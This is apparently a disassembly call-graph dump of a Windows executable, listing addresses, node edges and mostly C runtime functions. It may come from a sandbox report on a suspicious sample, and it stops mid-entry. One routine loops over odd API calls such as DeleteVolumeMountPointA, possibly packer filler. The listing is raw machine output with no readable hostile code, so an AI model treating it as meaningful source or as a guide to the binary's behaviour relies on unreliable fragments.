40db06 WideCharToMultiByte 7005->7008 7006->6996 7009 40db42 7007->7009 7010 40db2e WideCharToMultiByte 7007->7010 7008->7004 7011 40810e __calloc_crt 68 API calls 7009->7011 7010->7004 7010->7009 7012 40db4a 7011->7012 7012->7004 7013 40db53 WideCharToMultiByte 7012->7013 7013->7004 7014 40db65 7013->7014 7015 4081a8 __mtinitlocknum 68 API calls 7014->7015 7015->7004 7017 4026fc 7016->7017 7018 40274e InterlockedExchange 7017->7018 7019 40279b GetTickCount 7017->7019 7020 4027b3 OpenFileMappingW DeleteVolumeMountPointA 7017->7020 7021 402828 7017->7021 7018->7017 7019->7017 7020->7017 7021->6707 7023 40619b _raise 7 API calls 7022->7023 7024 403e12 __init_pointers __initp_misc_winsig 7023->7024 7044 406ba6 7024->7044 7027 406129 __encode_pointer 7 API calls 7028 403e4e 7027->7028 7028->6156 7030 4066d1 7029->7030 7031 406653 7030->7031 7032 406d45 __mtinitlocknum InitializeCriticalSectionAndSpinCount 7030->7032 7031->6146 7031->6166 7032->7030 7034 406269 7033->7034 7035 40625d 7033->7035 7036 40627d TlsFree 7034->7036 7038 40628b 7034->7038 7037 4061a4 __decode_pointer 6 API calls 7035->7037 7036->7038 7037->7034 7039 40672d DeleteCriticalSection 7038->7039 7041 406745 7038->7041 7040 4081a8 __mtinitlocknum 68 API calls 7039->7040 7040->7038 7042 406765 7041->7042 7043 406757 DeleteCriticalSection 7041->7043 7042->6151 7043->7041 7045 406129 __encode_pointer 7 API calls 7044->7045 7046 403e44 7045->7046 7046->7027 7048 403ca0 __close 7047->7048 7049 406842 __lock 68 API calls 7048->7049 7050 403ca7 7049->7050 7052 4061a4 __decode_pointer 6 API calls 7050->7052 7057 403d60 __initterm 7050->7057 7055 403cde 7052->7055 7054 403da8 __close 7054->6188 7055->7057 7059 4061a4 __decode_pointer 6 API calls 7055->7059 7064 403dab 7057->7064 7058 403d9f 7060 403ba4 __mtinitlocknum 3 API calls 7058->7060 7063 403cf3 7059->7063 7060->7054 7061 40619b 7 API calls _raise 7061->7063 7062 4061a4 6 API calls __decode_pointer 7062->7063 7063->7057 7063->7061 7063->7062 7065 403db1 7064->7065 7066 403d8c 7064->7066 7069 406768 LeaveCriticalSection 7065->7069 7066->7054 7068 406768 LeaveCriticalSection 7066->7068 7068->7058 7069->7066 7073 408844 7083 4087c8 7073->7083 7076 40886f setSBCS 7077 405ec0 setSBUpLow 5 API calls 7076->7077 7079 408a27 7077->7079 7078 4088b3 IsValidCodePage 7078->7076 7080 4088c5 GetCPInfo 7078->7080 7080->7076 7082 4088d8 _memset __setmbcp_nolock 7080->7082 7090 408591 GetCPInfo 7082->7090 7084 404698 _LocaleUpdate::_LocaleUpdate 78 API calls 7083->7084 7085 4087dc 7084->7085 7086 408805 7085->7086 7087 4087e7 GetOEMCP 7085->7087 7088 40880a GetACP 7086->7088 7089 4087f7 7086->7089 7087->7089 7088->7089 7089->7076 7089->7078 7089->7082 7091 408677 7090->7091 7094 4085c5 _memset 7090->7094 7096 405ec0 setSBUpLow 5 API calls 7091->7096 7092 40c6f0 ___crtGetStringTypeA 92 API calls 7093 408632 7092->7093 7100 40c4f1 7093->7100 7094->7092 7098 408722 7096->7098 7098->7082 7099 40c4f1 ___crtLCMapStringA 103 API calls 7099->7091 7101 404698 _LocaleUpdate::_LocaleUpdate 78 API calls 7100->7101 7102 40c504 7101->7102 7105 40c14c 7102->7105 7106 40c16d LCMapStringW 7105->7106 7109 40c188 7105->7109 7107 40c190 GetLastError 7106->7107 7106->7109 7107->7109 7108 40c386 7111 40d99f ___ansicp 92 API calls 7108->7111 7109->7108 7110 40c1e2 7109->7110 7112 40c1fb MultiByteToWideChar 7110->7112 7134 40c37d 7110->7134 7114 40c3ae 7111->7114 7119 40c228 7112->7119 7112->7134 7113 405ec0 setSBUpLow 5 API calls 7115 408652 7113->7115 7116 40c4a2 LCMapStringA 7114->7116 7117 40c3c7 7114->7117 7114->7134 7115->7099 7151 40c3fe 7116->7151 7120 40d9e8 ___convertcp 75 API calls 7117->7120 7118 40c279 MultiByteToWideChar 7121 40c292 LCMapStringW 7118->7121 7122 40c374 7118->7122 7124 40b484 _malloc 68 API calls 7119->7124 7131 40c241 __alloca_probe_16 7119->7131 7125 40c3d9 7120->7125 7121->7122 7126 40c2b3 7121->7126 7129 40a9ff __freea 68 API calls 7122->7129 7123 40c4c9 7132 4081a8 __mtinitlocknum 68 API calls 7123->7132 7123->7134 7124->7131 7128 40c3e3 LCMapStringA 7125->7128 7125->7134 7130 40c2bc 7126->7130 7137 40c2e5 7126->7137 7127 4081a8 __mtinitlocknum 68 API calls 7127->7123 7135 40c405 7128->7135 7128->7151 7129->7134 7130->7122 7133 40c2ce LCMapStringW 7130->7133 7131->7118 7131->7134 7132->7134 7133->7122 7134->7113 7138 40c416 _memset __alloca_probe_16 7135->7138 7139 40b484 _malloc 68 API calls 7135->7139 7136 40c334 LCMapStringW 7140 40c34c WideCharToMultiByte 7136->7140 7141 40c36e 7136->7141 7142 40c300 __alloca_probe_16 7137->7142 7143 40b484 _malloc 68 API calls 7137->7143 7145 40c454 LCMapStringA 7138->7145 7138->7151 7139->7138 7140->7141 7144 40a9ff __freea 68 API calls 7141->7144 7142->7122 7142->7136 7143->7142 7144->7122 7147 40c474 7145->7147 7149 40c470 7145->7149 7148 40d9e8 ___convertcp 75 API calls 7147->7148 7148->7149 7150 40a9ff __freea 68 API calls 7149->7150 7150->7151 7151->7123 7151->7127 7199 40640a 7200 406416 __close 7199->7200 7201 40642e 7200->7201 7202 406518 __close 7200->7202 7203 4081a8 __mtinitlocknum 68 API calls 7200->7203 7204 4081a8 __mtinitlocknum 68 API calls 7201->7204 7205 40643c 7201->7205 7203->7201 7204->7205 7206 40644a 7205->7206 7207 4081a8 __mtinitlocknum 68 API calls 7205->7207 7208 406458 7206->7208 7209 4081a8 __mtinitlocknum 68 API calls 7206->7209 7207->7206 7210 406466 7208->7210 7211 4081a8 __mtinitlocknum 68 API calls 7208->7211 7209->7208 7212 406474 7210->7212 7213 4081a8 __mtinitlocknum 68 API calls 7210->7213 7211->7210 7214 406482 7212->7214 7215 4081a8 __mtinitlocknum 68 API calls 7212->7215 7213->7212 7216 406493 7214->7216 7217 4081a8 __mtinitlocknum 68 API calls 7214->7217 7215->7214 7218 406842 __lock 68 API calls 7216->7218 7217->7216 7219 40649b 7218->7219 7220 4064c0 7219->7220 7221 4064a7 InterlockedDecrement 7219->7221 7235 406524 7220->7235 7221->7220 7222 4064b2 7221->7222 7222->7220 7226 4081a8 __mtinitlocknum 68 API calls 7222->7226 7225 406842 __lock 68 API calls 7227 4064d4 7225->7227 7226->7220 7228 406505 7227->7228 7229 408db9 ___removelocaleref 8 API calls 7227->7229 7238 406530 7228->7238 7233 4064e9 7229->7233 7232 4081a8 __mtinitlocknum 68 API calls 7232->7202 7233->7228 7234 408be1 ___freetlocinfo 68 API calls 7233->7234 7234->7228 7241 406768 LeaveCriticalSection 7235->7241 7237 4064cd 7237->7225 7242 406768 LeaveCriticalSection 7238->7242 7240 406512 7240->7232 7241->7237 7242->7240 7544 408b8a 7547 406768 LeaveCriticalSection 7544->7547 7546 408b91 7547->7546 7281 409dcb 7284 409d43 7281->7284 7283 409de9 7285 409d50 7284->7285 7286 409daf 7284->7286 7285->7286 7288 409d55 7285->7288 7342 409634 7286->7342 7290 409d73 7288->7290 7291 409d5a 7288->7291 7289 409d94 7289->7283 7293 409d96 7290->7293 7295 409d7d 7290->7295 7298 409b8e 7291->7298 7329 409724 7293->7329 7312 409c49 7295->7312 7356 40d03a 7298->7356 7301 409bc8 7303 404382 __close 68 API calls 7301->7303 7302 409be7 7366 40cebe 7302->7366 7304 409bcd 7303->7304 7305 404856 __close 6 API calls 7304->7305 7306 409bd9 7305->7306 7309 405ec0 setSBUpLow 5 API calls 7306->7309 7311 409c47 7309->7311 7311->7283 7313 40d03a __fltout2 68 API calls 7312->7313 7315 409c7a 7313->7315 7314 409c83 7316 404382 __close 68 API calls 7314->7316 7315->7314 7317 409ca5 7315->7317 7318 409c88 7316->7318 7321 40cebe __fptostr 68 API calls 7317->7321 7319 404856 __close 6 API calls 7318->7319 7320 409c94 7319->7320 7323 405ec0 setSBUpLow 5 API calls 7320->7323 7322 409cd1 7321->7322 7322->7320 7325 409d18 7322->7325 7327 409cf0 7322->7327 7324 409d41 7323->7324 7324->7289 7410 4094c5 7325->7410 7328 409a97 __cftof2_l 78 API calls 7327->7328 7328->7320 7330 404698 _LocaleUpdate::_LocaleUpdate 78 API calls 7329->7330 7331 409749 7330->7331 7332 409758 7331->7332 7333 409788 7331->7333 7334 404382 __close 68 API calls 7332->7334 7335 409796 7333->7335 7339 40979f 7333->7339 7336 40975d 7334->7336 7337 404382 __close 68 API calls 7335->7337 7338 404856 __close 6 API calls 7336->7338 7337->7336 7341 40976c _memset __alldvrm __cftoa_l _strrchr 7338->7341 7339->7341 7429 409704 7339->7429 7341->7289 7343 40d03a __fltout2 68 API calls 7342->7343 7344 409665 7343->7344 7345 40966e 7344->7345 7347 40968d 7344->7347 7346 404382 __close 68 API calls 7345->7346 7348 409673 7346->7348 7350 40cebe __fptostr 68 API calls 7347->7350 7349 404856 __close 6 API calls 7348->7349 7353 40967f 7349->7353 7351 4096d1 7350->7351 7351->7353 7354 4094c5 __cftoe2_l 78 API calls 7351->7354 7352 405ec0 setSBUpLow 5 API calls 7355 409702 7352->7355 7353->7352 7354->7353 7355->7289 7357 40d065 ___dtold 7356->7357 7392 40ed1c 7357->7392 7360 40a627 _strcpy_s 68 API calls 7361 40d0a0 7360->7361 7362 40472e __invoke_watson 10 API calls 7361->7362 7364 40d0b3 7361->7364 7362->7364 7363 405ec0 setSBUpLow 5 API calls 7365 409bbf 7363->7365 7364->7363 7365->7301 7365->7302 7367 40cef3 7366->7367 7368 40ced5 7366->7368 7367->7368 7370 40cef8 7367->7370 7369 404382 __close 68 API calls 7368->7369 7371 40ceda 7369->7371 7373 40cf0d 7370->7373 7376 40cf1b _strlen 7370->7376 7372 404856 __close 6 API calls 7371->7372 7375 409c1a 7372->7375 7374 404382 __close 68 API calls 7373->7374 7374->7371 7375->7306 7378 409a97 7375->7378 7376->7375 7377 40b0d0 ___sbh_free_block __VEC_memcpy 7376->7377 7377->7375 7379 404698 _LocaleUpdate::_LocaleUpdate 78 API calls 7378->7379 7380 409ab5 7379->7380 7381 409ab9 7380->7381 7385 409aec 7380->7385 7382 404382 __close 68 API calls 7381->7382 7383 409abe 7382->7383 7384 404856 __close 6 API calls 7383->7384 7391 409acf _memset 7384->7391 7386 409b28 7385->7386 7406 409480 7385->7406 7388 409480 __shift __VEC_memcpy 7386->7388 7386->7391 7389 409b3d 7388->7389 7390 409480 __shift __VEC_memcpy 7389->7390 7389->7391 7390->7391 7391->7306 7396 40ed92 7392->7396 7393 40edff 7395 40a627 _strcpy_s 68 API calls 7393->7395 7394 405ec0 setSBUpLow 5 API calls 7397 40d080 7394->7397 7398 40ee62 7395->7398 7396->7393 7399 40ee17 7396->7399 7405 40edaf 7396->7405 7397->7360 7400 40472e __invoke_watson 10 API calls 7398->7400 7398->7405 7401 40a627 _strcpy_s 68 API calls 7399->7401 7400->7405 7402 40ee36 7401->7402 7403 40472e __invoke_watson 10 API calls 7402->7403 7402->7405 7403->7405 7404 40f614 7405->7394 7405->7404 7407 409489 _strlen 7406->7407 7408 40949a 7406->7408 7409 40b0d0 ___sbh_free_block __VEC_memcpy 7407->7409 7408->7386 7409->7408 7411 404698 _LocaleUpdate::_LocaleUpdate 78 API calls 7410->7411 7412 4094dd 7411->7412 7413 4094e3 7412->7413 7414 409513 7412->7414 7415 404382 __close 68 API calls 7413->7415 7418 409530 7414->7418 7419 409527 7414->7419 7416 4094e8 7415->7416 7417 404856 __close 6 API calls 7416->7417 7426 4094f7 7417->7426 7421 409480 __shift __VEC_memcpy 7418->7421 7422 409554 7418->7422 7420 404382 __close 68 API calls 7419->7420 7420->7416 7421->7422 7423 40a627 _strcpy_s 68 API calls 7422->7423 7424 4095ab 7423->7424 7425 40472e __invoke_watson 10 API calls 7424->7425 7427 4095be 7424->7427 7425->7427 7426->7320 7427->7426 7428 40b0d0 ___sbh_free_block __VEC_memcpy 7427->7428 7428->7426 7430 409634 __cftoe_l 78 API calls 7429->7430 7431 40971f 7430->7431 7431->7341 7432 404acf 7433 404ad7 __cfltcvt_init 7432->7433 7438 409e57 GetModuleHandleA 7433->7438 7436 404aec 7439 409e66 GetProcAddress 7438->7439 7440 404adc 7438->7440 7439->7440 7440->7436 7441 409dee 7440->7441 7446 40d1cf 7441->7446 7443 409e03 7444 409e14 7443->7444 7445 40472e __invoke_watson 10 API calls 7443->7445 7444->7436 7445->7444 7447 40d1ea __control87 7446->7447 7449 40d213 __control87 7446->7449 7448 404382 __close 68 API calls 7447->7448 7450 40d204 7448->7450 7449->7443 7451 404856 __close 6 API calls 7450->7451 7451->7449 7152 409250 7153 409262 7152->7153 7155 409270 @_EH4_CallFilterFunc@8 7152->7155 7154 405ec0 setSBUpLow 5 API calls 7153->7154 7154->7155 7548 406b91 7549 406b94 7548->7549 7550 4039d2 _abort 70 API calls 7549->7550 7551 406ba0 __close 7550->7551 7243 406216 TlsAlloc 7552 40459a 7559 40845f 7552->7559 7555 4045ad 7557 4081a8 __mtinitlocknum 68 API calls 7555->7557 7558 4045b8 7557->7558 7572 408385 7559->7572 7561 40459f 7561->7555 7562 408236 7561->7562 7563 408242 __close 7562->7563 7564 406842 __lock 68 API calls 7563->7564 7567 40824e 7564->7567 7565 4082b7 7613 4082cc 7565->7613 7567->7565 7570 40828c DeleteCriticalSection 7567->7570 7600 40b7e0 7567->7600 7568 4082c3 __close 7568->7555 7571 4081a8 __mtinitlocknum 68 API calls 7570->7571 7571->7567 7573 408391 __close 7572->7573 7574 406842 __lock 68 API calls 7573->7574 7581 4083a0 7574->7581 7575 408438 7590 408456 7575->7590 7578 408444 __close 7578->7561 7580 40833d 106 API calls __fflush_nolock 7580->7581 7581->7575 7581->7580 7582 4045fb 7581->7582 7587 408427 7581->7587 7583 404608 7582->7583 7584 40461e EnterCriticalSection 7582->7584 7585 406842 __lock 68 API calls 7583->7585 7584->7581 7586 404611 7585->7586 7586->7581 7593 404669 7587->7593 7589 408435 7589->7581 7599 406768 LeaveCriticalSection 7590->7599 7592 40845d 7592->7578 7594 404679 7593->7594 7595 40468c LeaveCriticalSection 7593->7595 7598 406768 LeaveCriticalSection 7594->7598 7595->7589 7597 404689 7597->7589 7598->7597 7599->7592 7601 40b7ec __close 7600->7601 7602 40b800 7601->7602 7603 40b81d 7601->7603 7604 404382 __close 68 API calls 7602->7604 7610 40b815 __close 7603->7610 7616 4045ba 7603->7616 7606 40b805 7604->7606 7608 404856 __close 6 API calls 7606->7608 7608->7610 7610->7567 7860 406768 LeaveCriticalSection 7613->7860 7615 4082d3 7615->7568 7617 4045cc 7616->7617 7618 4045ee EnterCriticalSection 7616->7618 7617->7618 7619 4045d4 7617->7619 7620 4045e4 7618->7620 7621 406842 __lock 68 API calls 7619->7621 7622 40b769 7620->7622 7621->7620 7623 40b799 7622->7623 7624 40b77d 7622->7624 7630 40b792 7623->7630 7641 4082d5 7623->7641 7625 404382 __close 68 API calls 7624->7625 7626 40b782 7625->7626 7628 404856 __close 6 API calls 7626->7628 7628->7630 7638 40b854 7630->7638 7636 40b7b9 7636->7630 7637 4081a8 __mtinitlocknum 68 API calls 7636->7637 7637->7630 7853 40462d 7638->7853 7640 40b85a 7640->7610 7642 408310 7641->7642 7643 4082ee 7641->7643 7647 40d62a 7642->7647 7643->7642 7644 4084cc __fileno 68 API calls 7643->7644 7645 408309 7644->7645 7680 40bf8f 7645->7680 7648 40b7ad 7647->7648 7649 40d63a 7647->7649 7651 4084cc 7648->7651 7649->7648 7650 4081a8 __mtinitlocknum 68 API calls 7649->7650 7650->7648 7652 4084f0 7651->7652 7653 4084db 7651->7653 7657 40d55d 7652->7657 7654 404382 __close 68 API calls 7653->7654 7655 4084e0 7654->7655 7656 404856 __close 6 API calls 7655->7656 7656->7652 7658 40d569 __close 7657->7658 7659 40d571 7658->7659 7660 40d58c 7658->7660 7661 404395 __close 68 API calls 7659->7661 7662 40d59a 7660->7662 7666 40d5db 7660->7666 7664 40d576 7661->7664 7663 404395 __close 68 API calls 7662->7663 7665 40d59f 7663->7665 7667 404382 __close 68 API calls 7664->7667 7668 404382 __close 68 API calls 7665->7668 7669 40d8d8 ___lock_fhandle 69 API calls 7666->7669 7670 40d57e __close 7667->7670 7671 40d5a6 7668->7671 7672 40d5e1 7669->7672 7670->7636 7673 404856 __close 6 API calls 7671->7673 7674 40d5fc 7672->7674 7675 40d5ee 7672->7675 7673->7670 7677 404382 __close 68 API calls 7674->7677 7825 40d4c1 7675->7825 7678 40d5f6 7677->7678 7840 40d620 7678->7840 7681 40bf9b __close 7680->7681 7682 40bfa3 7681->7682 7686 40bfbe 7681->7686 7705 404395 7682->7705 7684 40bfcc 7687 404395 __close 68 API calls 7684->7687 7686->7684 7688 40c00d 7686->7688 7690 40bfd1 7687->7690 7708 40d8d8 7688->7708 7689 404382 __close 68 API calls 7698 40bfb0 __close 7689->7698 7692 404382 __close 68 API calls 7690->7692 7694 40bfd8 7692->7694 7693 40c013 7695 40c020 7693->7695 7696 40c036 7693->7696 7697 404856 __close 6 API calls 7694->7697 7718 40b85c 7695->7718 7700 404382 __close 68 API calls 7696->7700 7697->7698 7698->7642 7702 40c03b 7700->7702 7701 40c02e 7777 40c061 7701->7777 7703 404395 __close 68 API calls 7702->7703 7703->7701 7706 406377 __getptd_noexit 68 API calls 7705->7706 7707 40439a 7706->7707 7707->7689 7709 40d8e4 __close 7708->7709 7710 40d93f 7709->7710 7711 406842 __lock 68 API calls 7709->7711 7712 40d961 __close 7710->7712 7713 40d944 EnterCriticalSection 7710->7713 7714 40d910 7711->7714 7712->7693 7713->7712 7715 406d45 __mtinitlocknum InitializeCriticalSectionAndSpinCount 7714->7715 7717 40d927 7714->7717 7715->7717 7780 40d96f 7717->7780 7719 40b86b __write_nolock 7718->7719 7720 40b8c4 7719->7720 7721 40b89d 7719->7721 7751 40b892 7719->7751 7725 40b92c 7720->7725 7726 40b906 7720->7726 7722 404395 __close 68 API calls 7721->7722 7724 40b8a2 7722->7724 7723 405ec0 setSBUpLow 5 API calls 7727 40bf8d 7723->7727 7729 404382 __close 68 API calls 7724->7729 7728 40b940 7725->7728 7784 40d720 7725->7784 7730 404395 __close 68 API calls 7726->7730 7727->7701 7794 408468 7728->7794 7732 40b8a9 7729->7732 7734 40b90b 7730->7734 7736 404856 __close 6 API calls 7732->7736 7735 404382 __close 68 API calls 7734->7735 7738 40b914 7735->7738 7736->7751 7737 40b94b 7739 40bbf1 7737->7739 7743 4063f0 __getptd 68 API calls 7737->7743 7740 404856 __close 6 API calls 7738->7740 7741 40bec0 WriteFile 7739->7741 7742 40bc01 7739->7742 7740->7751 7744 40bef3 GetLastError 7741->7744 7745 40bbd3 7741->7745 7746 40bcdf 7742->7746 7766 40bc15 7742->7766 7747 40b966 GetConsoleMode 7743->7747 7744->7745 7748 40bf3e 7745->7748 7745->7751 7753 40bf11 7745->7753 7765 40bdbf 7746->7765 7768 40bcee 7746->7768 7747->7739 7749 40b991 7747->7749 7748->7751 7752 404382 __close 68 API calls 7748->7752 7749->7739 7750 40b9a3 GetConsoleCP 7749->7750 7750->7745 7771 40b9c6 7750->7771 7751->7723 7755 40bf61 7752->7755 7757 40bf30 7753->7757 7758 40bf1c 7753->7758 7754 40bc83 WriteFile 7754->7744 7754->7766 7759 404395 __close 68 API calls 7755->7759 7756 40be25 WideCharToMultiByte 7756->7744 7761 40be5c WriteFile 7756->7761 7806 4043a8 7757->7806 7760 404382 __close 68 API calls 7758->7760 7759->7751 7767 40bf21 7760->7767 7764 40be93 GetLastError 7761->7764 7761->7765 7762 40bd63 WriteFile 7762->7744 7762->7768 7764->7765 7765->7745 7765->7748 7765->7756 7765->7761 7766->7745 7766->7748 7766->7754 7770 404395 __close 68 API calls 7767->7770 7768->7745 7768->7748 7768->7762 7770->7751 7771->7744 7771->7745 7772 4090b2 80 API calls __fassign 7771->7772 7773 40ba72 WideCharToMultiByte 7771->7773 7775 40d65b 11 API calls __putwch_nolock 7771->7775 7776 40baf7 WriteFile 7771->7776 7803 409104 7771->7803 7772->7771 7773->7745 7774 40baa3 WriteFile 7773->7774 7774->7744 7774->7771 7775->7771 7776->7744 7776->7771 7824 40d978 LeaveCriticalSection 7777->7824 7779 40c069 7779->7698 7783 406768 LeaveCriticalSection 7780->7783 7782 40d976 7782->7710 7783->7782 7811 40d861 7784->7811 7786 40d73e 7787 40d746 7786->7787 7788 40d757 SetFilePointer 7786->7788 7789 404382 __close 68 API calls 7787->7789 7790 40d76f GetLastError 7788->7790 7791 40d74b 7788->7791 7789->7791 7790->7791 7792 40d779 7790->7792 7791->7728 7793 4043a8 __dosmaperr 68 API calls 7792->7793 7793->7791 7795 408484 7794->7795 7796 408475 7794->7796 7798 4084a8 7795->7798 7799 404382 __close 68 API calls 7795->7799 7797 404382 __close 68 API calls 7796->7797 7800 40847a 7797->7800 7798->7737 7801 408498 7799->7801 7800->7737 7802 404856 __close 6 API calls 7801->7802 7802->7798 7804 4090cc __isleadbyte_l 78 API calls 7803->7804 7805 409113 7804->7805 7805->7771 7807 404395 __close 68 API calls 7806->7807 7808 4043b3 _realloc 7807->7808 7809 404382 __close 68 API calls 7808->7809 7810 4043c6 7809->7810 7810->7751 7812 40d886 7811->7812 7813 40d86e 7811->7813 7815 404395 __close 68 API calls 7812->7815 7819 40d8cb 7812->7819 7814 404395 __close 68 API calls 7813->7814 7816 40d873 7814->7816 7817 40d8b4 7815->7817 7818 404382 __close 68 API calls 7816->7818 7820 404382 __close 68 API calls 7817->7820 7821 40d87b 7818->7821 7819->7786 7822 40d8bb 7820->7822 7821->7786 7823 404856 __close 6 API calls 7822->7823 7823->7819 7824->7779 7826 40d861 __commit 68 API calls 7825->7826 7828 40d4d1 7826->7828 7827 40d527 7843 40d7db 7827->7843 7828->7827 7830 40d861 __commit 68 API calls 7828->7830 7839 40d505 7828->7839 7834 40d4fc 7830->7834 7831 40d861 __commit 68 API calls 7835 40d511 CloseHandle 7831->7835 7833 40d551 7833->7678 7837 40d861 __commit 68 API calls 7834->7837 7835->7827 7838 40d51d GetLastError 7835->7838 7836 4043a8 __dosmaperr 68 API calls 7836->7833 7837->7839 7838->7827 7839->7827 7839->7831 7852 40d978 LeaveCriticalSection 7840->7852 7842 40d628 7842->7670 7844 40d847 7843->7844 7845 40d7ec 7843->7845 7846 404382 __close 68 API calls 7844->7846 7845->7844 7848 40d817 7845->7848 7847 40d84c 7846->7847 7849 404395 __close 68 API calls 7847->7849 7850 40d52f 7848->7850 7851 40d837 SetStdHandle 7848->7851 7849->7850 7850->7833 7850->7836 7851->7850 7852->7842 7854 40465d LeaveCriticalSection 7853->7854 7855 40463e 7853->7855 7854->7640 7855->7854 7856 404645 7855->7856 7859 406768 LeaveCriticalSection 7856->7859 7858 40465a 7858->7640 7859->7858 7860->7615 7070 40619b 7071 406129 __encode_pointer 7 API calls 7070->7071 7072 4061a2 7071->7072 7452 406ddc 7453 406e18 7452->7453 7455 406dee 7452->7455 7455->7453 7456 406b6d 7455->7456 7457 406b79 __close 7456->7457 7458 4063f0 __getptd 68 API calls 7457->7458 7460 406b7e 7458->7460 7462 4039d2 7460->7462 7463 4039f1 7462->7463 7464 4039f8 7462->7464 7466 405cdc __NMSG_WRITE 68 API calls 7463->7466 7474 405b1f 7464->7474 7466->7464 7469 403ae1 7498 403dd6 7469->7498 7470 403a09 _memset 7470->7469 7472 403aa1 SetUnhandledExceptionFilter UnhandledExceptionFilter 7470->7472 7472->7469 7475 4061a4 __decode_pointer 6 API calls 7474->7475 7476 4039fe 7475->7476 7476->7470 7477 405b2c 7476->7477 7480 405b38 __close 7477->7480 7478 405b94 7479 405b75 7478->7479 7483 405ba3 7478->7483 7484 4061a4 __decode_pointer 6 API calls 7479->7484 7480->7478 7480->7479 7481 405b5f 7480->7481 7486 405b5b 7480->7486 7482 406377 __getptd_noexit 68 API calls 7481->7482 7487 405b64 _siglookup 7482->7487 7485 404382 __close 68 API calls 7483->7485 7484->7487 7488 405ba8 7485->7488 7486->7481 7486->7483 7489 405c0a 7487->7489 7491 403dd6 _raise 68 API calls 7487->7491 7497 405b6d __close 7487->7497 7490 404856 __close 6 API calls 7488->7490 7492 406842 __lock 68 API calls 7489->7492 7494 405c15 7489->7494 7490->7497 7491->7489 7492->7494 7493 40619b _raise 7 API calls 7495 405c4a 7493->7495 7494->7493 7494->7495 7501 405ca0 7495->7501 7497->7470 7499 403c94 _doexit 68 API calls 7498->7499 7500 403ae8 7499->7500 7502 405ca6 7501->7502 7503 405cad 7501->7503 7505 406768 LeaveCriticalSection 7502->7505 7503->7497 7505->7503 7861 40fa9c 7862 40fab5 7861->7862 7863 40faad 7861->7863 7865 40fac7 7862->7865 7866 40fac4 CloseHandle 7862->7866 7863->7862 7864 40fab2 CloseHandle 7863->7864 7864->7862 7866->7865 7244 406e1e SetUnhandledExceptionFilter 7867 40949f 7870 409313 7867->7870 7871 404698 _LocaleUpdate::_LocaleUpdate 78 API calls 7870->7871 7872 409327 7871->7872 7879 40cd42 7872->7879 7874 409333 7875 409347 7874->7875 7883 40a9d1 7874->7883 7877 40cd42 __forcdecpt_l 103 API calls 7875->7877 7878 409350 7877->7878 7880 40cd60 7879->7880 7881 40cd50 7879->7881 7888 40cc2d 7880->7888 7881->7874 7884 40a9f1 7883->7884 7885 40a9df 7883->7885 7900 40a980 7884->7900 7885->7874 7889 404698 _LocaleUpdate::_LocaleUpdate 78 API calls 7888->7889 7890 40cc42 7889->7890 7891 40cca2 7890->7891 7892 40cc4e 7890->7892 7894 4090cc __isleadbyte_l 78 API calls 7891->7894 7897 40ccc7 7891->7897 7893 40a7e0 __isctype_l 92 API calls 7892->7893 7898 40cc66 7892->7898 7893->7898 7894->7897 7895 404382 __close 68 API calls 7896 40cccd 7895->7896 7899 40c4f1 ___crtLCMapStringA 103 API calls 7896->7899 7897->7895 7897->7896 7898->7881 7899->7898 7901 404698 _LocaleUpdate::_LocaleUpdate 78 API calls 7900->7901 7902 40a993 7901->7902 7903 40a7e0 __isctype_l 92 API calls 7902->7903 7904 40a9ad 7902->7904 7903->7904 7904->7874 7506 4048e0 7507 404919 7506->7507 7508 40490c 7506->7508 7510 405ec0 setSBUpLow 5 API calls 7507->7510 7509 405ec0 setSBUpLow 5 API calls 7508->7509 7509->7507 7511 404929 __except_handler4 __IsNonwritableInCurrentImage 7510->7511 7512 4049ac 7511->7512 7513 404982 __except_handler4 7511->7513 7522 4092e2 RtlUnwind 7511->7522 7513->7512 7514 40499c 7513->7514 7515 405ec0 setSBUpLow 5 API calls 7513->7515 7516 405ec0 setSBUpLow 5 API calls 7514->7516 7515->7514 7516->7512 7518 4049fb __except_handler4 7519 404a2f 7518->7519 7520 405ec0 setSBUpLow 5 API calls 7518->7520 7521 405ec0 setSBUpLow 5 API calls 7519->7521 7520->7519 7521->7513 7522->7518 7156 409466 7159 409424 7156->7159 7160 409450 7159->7160 7161 409437 7159->7161 7172 40ce16 7160->7172 7165 40cd6e 7161->7165 7164 409440 7166 404698 _LocaleUpdate::_LocaleUpdate 78 API calls 7165->7166 7167 40cd94 7166->7167 7179 40e624 7167->7179 7169 40cdac __ld12tod 7170 405ec0 setSBUpLow 5 API calls 7169->7170 7171 40ce14 7170->7171 7171->7164 7173 404698 _LocaleUpdate::_LocaleUpdate 78 API calls 7172->7173 7174 40ce3c 7173->7174 7175 40e624 ___strgtold12_l 68 API calls 7174->7175 7176 40ce54 __ld12tod 7175->7176 7177 405ec0 setSBUpLow 5 API calls 7176->7177 7178 40cebc 7177->7178 7178->7164 7180 40e66f 7179->7180 7186 40e68e 7179->7186 7181 404382 __close 68 API calls 7180->7181 7182 40e674 7181->7182 7183 404856 __close 6 API calls 7182->7183 7188 40e684 7183->7188 7184 405ec0 setSBUpLow 5 API calls 7185 40ece9 7184->7185 7185->7169 7186->7188 7189 40fb31 7186->7189 7188->7184 7192 40fb63 7189->7192 7190 405ec0 setSBUpLow 5 API calls 7191 40fcfd 7190->7191 7191->7188 7192->7190 7527 4044e9 7528 4044f6 7527->7528 7529 40810e __calloc_crt 68 API calls 7528->7529 7530 404510 7529->7530 7531 40810e __calloc_crt 68 API calls 7530->7531 7532 404529 7530->7532 7531->7532 7905 403fab 7908 406bb8 7905->7908 7909 406377 __getptd_noexit 68 API calls 7908->7909 7910 403fbc 7909->7910 7245 40692f 7246 40810e __calloc_crt 68 API calls 7245->7246 7247 40693b 7246->7247 7248 406129 __encode_pointer 7 API calls 7247->7248 7249 406943 7248->7249 7911 4094b2 7914 409386 7911->7914 7915 404698 _LocaleUpdate::_LocaleUpdate 78 API calls 7914->7915 7916 40939a 7915->7916 7193 40a977 7194 403b50 __amsg_exit 68 API calls 7193->7194 7195 40a97e 7194->7195 7196 406d7d 7197 406d89 SetLastError 7196->7197 7198 406d91 __close 7196->7198 7197->7198 7533 4040fe 7534 404118 __indefinite 7533->7534 7535 40418a 69 API calls 7534->7535 7536 404130 7535->7536 7537 403ffe 7540 407430 7537->7540 7539 404003 7539->7539 7541 407462 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 7540->7541 7542 407455 7540->7542 7543 407459 7541->7543 7542->7541 7542->7543 7543->7539 7917 403fbf 7918 403fd4 7917->7918 7919 403fce 7917->7919 7923 403dfb 7918->7923 7921 403dd6 _raise 68 API calls 7919->7921 7921->7918 7922 403fd9 __close 7924 403c94 _doexit 